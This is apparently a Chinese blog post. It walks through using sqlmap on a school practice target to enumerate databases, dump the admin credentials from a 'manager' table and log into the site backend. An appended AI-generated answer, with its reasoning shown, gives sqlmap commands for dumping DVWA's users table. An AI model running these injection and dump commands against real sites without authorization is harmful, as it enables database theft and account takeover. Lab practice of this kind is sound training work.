sqlmap_injection_to admin

本文详细介绍了如何使用SQLMap工具找到并利用网站的SQL注入漏洞,通过一系列的数据库和表名爆破,最终获取管理员账号密码,成功登录网站后台。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

利用 sqlmap 获得网站后台管理权限

(学校靶机)

0x00,0x01,0x02,0xo…

1,首先找到网站注入点:http://117.167.136.244:28004/index/narticle.php?nid=3100

上命令行扫描数据库:python sqlmap.py -u "http://117.167.136.244:28019/index/narticle.php?nid=3100" --dbs 

在这里插入图片描述这里盲猜是 rjxy 这个数据库,继续上命令行,进行数据表的爆破:

python sqlmap.py -u "http://117.167.136.244:28019/index/narticle.php?nid=3100" -D rjxy --tables

在这里插入图片描述得到 数据表,然后看见 manager 这个表,猜测管理员账号密码就放在这张表,继续进行字段以及字段值的爆破:
上命令行:

python sqlmap.py -u "http://117.167.136.244:28000/index/narticle.php?nid=3100" -D rjxy -T manager --columns

以及:
python sqlmap.py -u "http://117.167.136.244:28000/index/narticle.php?nid=3100" -D rjxy -T manager -C "username,password"

最后获得 admin 以及密码;
最后使用robots.txt robot协议查看敏感访问页面,发现:
在这里插入图片描述访问此页面进入登录界面,然后输入管理员账号密码成功进入网站后台。

<think>好的,我需要帮助用户了解如何使用sqlmap测试DVWA中的SQL注入漏洞。首先,用户可能需要知道DVWA是一个演练环境,用来学习Web应用的安全漏洞。SQL注入是其中一种常见漏洞,sqlmap是一个自动化检测和利用SQL注入的工具。 根据用户提供的引用,我注意到有几个关键步骤。首先,用户需要确保已经设置好DVWA环境,并且安全级别设置为low,这样漏洞更容易被利用。接下来,用户需要获取当前的PHPSESSID和security cookie,这些信息在引用[1]、[3]、[4]中都有提到。例如,在引用[4]中,命令中包含了--cookie参数,指定了PHPSESSID和security=low。 然后,用户需要构造sqlmap命令,指定目标URL和cookie。引用[1]和[4]中的命令示例显示,使用-u参数指定URL,--cookie提供会话信息。此外,可能需要使用--batch参数让sqlmap自动执行默认选项,避免交互式输入,这在引用[1]和[4]中都有应用。 用户可能需要逐步进行测试,比如先获取数据库名称,然后枚举表,再获取列和数据。引用[1]中提到使用-D dvwa --tables来爆破特定数据库下的表名,而引用[3]则解释了检测结果,说明sqlmap如何识别注入点。 此外,用户需要注意DVWA的配置是否正确,比如URL是否正确,cookie是否有效。如果遇到问题,可能需要检查网络连接或DVWA的安全级别设置。 最后,用户可能需要了解sqlmap的高级选项,如风险级别和漏洞类型,如引用[3]中提到的--risk和--level参数,以调整检测的强度。 总结下来,步骤应该是:1. 设置DVWA环境;2. 获取会话cookie;3. 运行sqlmap命令进行检测;4. 枚举数据库、表、列和数据。同时,用户需要注意命令的正确性和环境配置,确保测试顺利进行。</think>### 如何使用sqlmap测试DVWA的SQL注入漏洞 #### 步骤1:环境准备 1. **启动DVWA环境** 确保DVWA(Damn Vulnerable Web Application)已部署在本地或靶机环境(如`http://dvwa/`或`http://192.168.1.2/dvwa/`)[^2][^4]。 2. **设置安全等级为Low** 登录DVWA后,在"Security"页面将安全级别调整为**Low**,以启用基础漏洞[^3]。 --- #### 步骤2:获取会话Cookie 1. **登录DVWA** 使用默认账号`admin/password`登录,浏览器开发者工具(F12)中查看Cookie,记录`PHPSESSID`和`security=low`的值。 示例Cookie格式: `PHPSESSID=psuncupdhgq2rj4lkp7jp1s1h3; security=low`[^1]。 --- #### 步骤3:构造sqlmap命令 1. **基础探测命令** ```bash sqlmap -u "http://dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie "PHPSESSID=xxx; security=low" --batch ``` - `-u`:指定目标URL(需替换实际DVWA地址) - `--cookie`:注入时需携带有效的会话Cookie - `--batch`:自动选择默认选项,避免交互式提问 2. **探测数据库名** ```bash sqlmap -u "目标URL" --cookie "..." --batch --dbs ``` 结果示例: `available databases [2]: [...] dvwa` 3. **爆破表名** ```bash sqlmap -u "目标URL" --cookie "..." -D dvwa --tables ``` 结果示例: `Database: dvwa → [users, guestbook]`[^3] 4. **提取表数据** ```bash sqlmap -u "目标URL" --cookie "..." -D dvwa -T users --dump ``` 示例结果: `+---------+-----------+--------+` `| user_id | password | avatar |` `+---------+-----------+--------+`[^3] --- #### 步骤4:高级参数说明 - **风险等级调整** 使用`--risk 3`允许更高风险操作(如基于时间的盲注)[^3]。 - **指定漏洞类型** 若已知漏洞类型(如报错注入),添加`--technique=E`。 - **代理调试** 通过`--proxy=http://127.0.0.1:8080`将流量导向Burp Suite。 --- #### 注意事项 1. **URL编码问题** 确保URL中的`&`符号正确转义为`&`[^4]。 2. **Windows环境路径** 若在Windows运行,需使用`python sqlmap.py`调用工具。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值